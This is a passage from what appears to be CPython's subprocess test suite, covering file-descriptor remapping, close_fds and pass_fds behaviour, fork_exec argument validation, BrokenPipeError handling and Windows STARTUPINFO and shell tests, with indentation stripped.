# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = os.read(temp_fds[0], 1024).strip()
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = os.read(stderr_no, 1024).strip()
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if one of the fds is 0, 1 or 2, it is possible
# that it gets overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
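# Note: p1's pipe ends are not leaked into p2 even with close_fds=False,
# because the file descriptors Popen creates for its pipes are
# non-inheritable by default (PEP 446).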
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to avoid
# messing with the larger unittest process's maximum number of
# file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE after setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# allow some time for the process to exit, then create a new Popen:
# this should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as a dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. Ideally we would start with a valid
# *args list, confirm a good call works, and then mutate it in
# various ways to ensure that bad calls with individual arg type
# errors raise a TypeError. Saving that refactoring for a future
# PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test already read the exit
# status, so Popen could not read it and falls back to a default
# returncode instead.
self.assertIsNotNone(proc.returncode)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
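# With close_fds=True the pipe handle is not inherited by the child, so
# msvcrt.open_osfhandle() fails there and the traceback shows OSError.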
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
